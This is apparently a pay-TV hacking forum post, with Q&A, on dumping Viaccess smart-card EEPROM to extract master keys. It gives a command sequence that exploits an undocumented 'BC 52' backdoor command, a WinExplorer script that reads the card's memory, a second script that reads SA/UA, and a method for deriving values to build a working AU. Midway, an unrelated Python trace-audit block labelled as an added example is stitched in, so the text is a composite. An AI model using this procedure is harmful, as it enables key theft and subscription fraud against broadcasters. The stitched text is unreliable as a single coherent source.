Thanks to mrtoolate and others
Extracting keys from Viaccess cards
I will start with basic commands:
CA A4 00 00 00
Change to DF (Dedicated File), also called Master File or ISSUER.
The card will reply:
90 00 : OK
CA A4 02 00 00
Change to next EF (Elementary File) or supported provider.
The card will reply:
90 00 : OK
90 08 : nok no more
CA B0 00 00 xx
Reads from memory the result of the last command (memory reading).
The card will reply with xx bytes.
CA 88 00 0x yy
Send ECM to the card to be decrypted with key (x); (yy) is the length of the data
that follows. The card sends 88, then the receiver sends the yy data bytes.
If the signature is OK the card replies 90 00, if not 90 08.
CA AC A1 00 00
Always returns AC 90 00, and if you read the memory you will get the ISSUER Ident (FF F4 00).
Now how can we dump the EEPROM from Viaccess cards?
1-CA A4 00 00 00 :change to main file
:receive 90 00
2-CA A4 02 00 00 :Change to next EF
:receive 90 00
3-CA AC A1 00 00 :the ISSUER Ident
:receive AC 90 00
4-CA 88 00 08 44 :send ECM header key 8 with 68 bytes data length
:receive 88
5-40 92 00 00..00 :send 68 bytes data start with 40 92 and 66 bytes of
:zeros.
:receive 90 04
6-BC 52 00 00 00 :this command is a bug in the V1 card system, or a secret
:command, or opens a backdoor.
:receive 6B 00 "command not supported"
At this point the card is ready to read the EEPROM.
You can read about 7k bytes by sending the next command 27 times; each time
you read FF (255 bytes). 27 * 255 = 6885 bytes
7-CA B8 00 00 FF :Memory reading
You find all MKs in the memory dump of the card after 26, the provider id
and the MK index, for example:
26 FF F4 00 04 xx xx xx xx xx xx xx xx : MK04 for ISSUER
26 00 E4 00 01 xx xx xx xx xx xx xx xx : MK01 for SCT
-----------------------------------------------
Next the script for WinExplorer v4.6
-----------------------------------------------
dim i
sub main()
sc.write("ca a4 00 00 00")
sc.read(2)
sc.write("ca a4 02 00 00")
sc.read(2)
sc.write("ca ac a1 00 00")
sc.read(3)
sc.write("ca 88 00 08 44")
sc.read(1)
sc.write("40 92 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00")
sc.read(2)
sc.write("bc 52 00 00 00")
sc.read(2)
for i= 1 to 27
sc.write("ca b8 00 00 ff")
sc.read(1)
sc.read(255)
sc.read(2)
next
End Sub
-----------------------------------------------
End of script
-----------------------------------------------
I think the new Viaccess2 cards are the same as the old ones
with small modifications; one of them is that they fixed the (BC 52 00 00 00) command, so we need to find a new backdoor command.
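A defender-side view of the sequence above, as an added example that is not part of the original post: a small Python audit over a captured header/status trace that flags the anomalies the dump relies on. The trace format, the rule names and the assumption that CA is the only expected class byte are illustrative, and the status of the final read is assumed because the post does not list it.

```python
# Added example: audit a captured card trace (command header, status word).
# Status meanings are the ones stated on this page; anything else is "unlisted".
STATUS = {
    "9000": "OK",
    "9008": "no more / not OK",
    "9001": "card dead",
    "6B00": "command not supported",
}
EXPECTED_CLA = 0xCA            # assumption: documented commands here all use class CA
INS_ECM, INS_READ = 0x88, 0xB8

def parse_header(cmd_hex):
    """Split a 5-byte command header into CLA, INS, P1, P2 and length."""
    raw = bytes.fromhex(cmd_hex)
    if len(raw) != 5:
        raise ValueError(f"expected 5 header bytes, got {len(raw)}: {cmd_hex!r}")
    return dict(zip(("cla", "ins", "p1", "p2", "len"), raw))

def audit(trace):
    """Return (position, rule, detail) findings for a list of (header, status)."""
    findings, ecm_rejected = [], False
    for n, (cmd, sw) in enumerate(trace, 1):
        h = parse_header(cmd)
        sw = sw.replace(" ", "").upper()
        if sw not in STATUS:
            findings.append((n, "unlisted-status", sw))
        if h["cla"] != EXPECTED_CLA:
            findings.append((n, "unexpected-class", f"{h['cla']:02X} {h['ins']:02X}"))
        if h["ins"] == INS_ECM:
            ecm_rejected = sw != "9000"      # remember whether the last ECM was accepted
        elif h["ins"] == INS_READ and ecm_rejected:
            findings.append((n, "read-after-rejected-ecm", f"{h['len']} bytes"))
    return findings

# Constructed trace built from the header/status pairs in steps 1-7 above.
SAMPLE = [
    ("CA A4 00 00 00", "90 00"),
    ("CA A4 02 00 00", "90 00"),
    ("CA AC A1 00 00", "90 00"),
    ("CA 88 00 08 44", "90 04"),
    ("BC 52 00 00 00", "6B 00"),
    ("CA B8 00 00 FF", "90 00"),   # status assumed; the post does not list it
]
# Constructed normal session: provider walk ending in 90 08, then a record read.
BENIGN = [
    ("CA A4 00 00 00", "90 00"),
    ("CA A4 02 00 00", "90 00"),
    ("CA A4 02 00 00", "90 08"),
    ("CA AC A5 00 00", "90 00"),
    ("CA B8 00 00 06", "90 08"),
]
```

The normal session produces no findings, which shows that 90 08 on its own is not an alarm; the combination of a rejected ECM, an off-class command and a following read is.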
Q - 90 08 : nok no more - means the card is dead?
A - No, the card can support more than one provider, so
every provider has a file in the card. At startup the receiver changes from one file to the next and reads the data for that provider. At the end of the card files, when the receiver tries to see the next provider, the card sends 90 08, meaning no more providers; then the receiver goes back to the main file CA A4 00 00
so the receiver stores all providers' Ident and PPUA in memory to filter ECMs and EMMs for supported providers.
Card dead is 90 01.
Which is kind of stupid, because if the card is dead there is a great chance that it can't answer anything, and obviously not send this status word.
Q - But how do you extract the PPUA?
A - 'extract the PPUA'
'Extract' is the wrong word, 'read PPUA' is the right one...
ca ac a5 00 00 for normal mode
ca ac a5 8i 00 for Hashed Mode
ca ac a5 4i 00 for SuperEncryption mode
i = key 0..7 to calc hash or to crypt data
after ca ac...
if 90 00 answer you can get the data with
ca b8 00 00 Len
Normal Mode:
-> CA AC A5 00 00 [AC] (90 00)
-> CA B8 00 00 XX [B8] A5 04 C2 03 XX XX (90 08 ) <-- PPUA
SuperEncryption mode:
-> CA AC A5 45 00 [AC] (90 00)
-> CA B8 00 00 02 [B8] 92 08 (90 00)
-> CA B8 00 00 08 [B8] 6A 85 03 E8 74 E3 A3 97 (90 00)
-> CA B8 00 00 02 [B8] 81 02 (90 00)
-> CA B8 00 00 02 [B8] 60 DA (90 00)
-> Plain Data : [AE 00]
-> CA B8 00 00 02 [B8] 81 06 (90 00)
-> CA B8 00 00 06 [B8] 8D 1B 4D 93 17 3D (90 08 ) <-- PPUA Crypted data
-> Plain Data : [A5 04 C2 03 XX XX] <-- PPUA Crypted Calculated to plain
Hashed Mode:
-> CA AC A5 81 00 [AC] (90 00)
-> CA B8 00 00 02 [B8] AE 00 (90 00)
-> CA B8 00 00 02 [B8] A5 04 (90 00)
-> CA B8 00 00 04 [B8] C2 03 XX XX(90 00) <-- PPUA
-> CA B8 00 00 02 [B8] F0 08 (90 00)
-> CA B8 00 00 08 [B8] B3 51 87 81 44 FE 03 82 (90 08 )
These 3 methods can be used for all Records of Consultation.
Q - I was really looking for a way to read the SA and CustomWP, in order to make a working AU.
A - I actually used some logic. The order of the dump begins with the ISSUER "ex. viasat FF F4 00", followed by viasat nordic 01 0C 00, and then came the MKs after #26 (as stated in original post).
I looked for the first #26 and it had the ISSUER followed by xx xx xx xx xx FF,
Ex. SENDA
26 FF F5 10 xx xx xx xx FF
I have 3 original SENDA cards and two of them use the same serial except for the last 2 digits. The third serial is way off.
The two senda cards with almost the same serialnr had (in the dump) :
26 FF F5 10 XX XX XX 08 08 FF
26 FF F5 10 XX XX XX 06 06 FF
The difference being 06 and the 08, so I tried using the xx xx xx as a SA and the first 06/08 as a customwp.
It worked.
Much more fun than using MKextract
Think I tried it on via some time ago and it worked.
It would read SA, UA.
Sub Main()
verbose=false
sc.print(vbcr & "This script will check what SA/UA there is on a card!" & vbcr & vbcr)
sc.write("CA A4 04 00 03")
sc.read(1)
ppid = sc.inputbox("Input what PPID you want to check SA/UA to","Input PPID","000000")
sc.print("PPID: " & ppid & vbcr)
sc.write(ppid)
sc.read(2)
if sc.getbyte(1)=8 then
sc.print("not supported PPID!")
sc.msgbox("This PPID is not supported by the card!")
exit sub
end if
sc.write("CA AC A5 00 00")
sc.read(1)
do while sc.getbyte(0) <> 144 'until 90 is received
sc.read(1)
loop
sc.read(1)
sc.write("CA B8 00 00 06")
sc.read(1)
sc.read(2)
sc.read(4)
sa=(hex2(sc.getbyte(0)) & hex2(sc.getbyte(1)) & hex2(sc.getbyte(2)) & hex2(sc.getbyte(3)))
sc.print( vbcr & "SA IS: " & sa)
sc.read(2)
sc.write("CA AC A4 00 00")
sc.read(1)
do while sc.getbyte(0) <> 144 'until 90 is received
sc.read(1)
loop
sc.read(1)
sc.write("CA B8 00 00 07")
sc.read(1)
sc.read(2)
sc.read(5)
ua=(hex2(sc.getbyte(0)) & hex2(sc.getbyte(1)) & hex2(sc.getbyte(2)) & hex2(sc.getbyte(3)) & hex2(sc.getbyte(4)))
sc.print( vbcr & "UA IS: " & ua)
sc.read(2)
End Sub
function hex2(i)
s=hex(i)
if len(s)=1 then
s="0" & s
end if
hex2=s
end function
How to read out MKs from original card